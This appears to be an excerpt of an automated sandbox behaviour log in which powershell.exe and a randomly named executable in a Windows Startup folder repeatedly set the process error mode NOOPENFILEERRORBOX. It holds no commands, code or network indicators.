Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
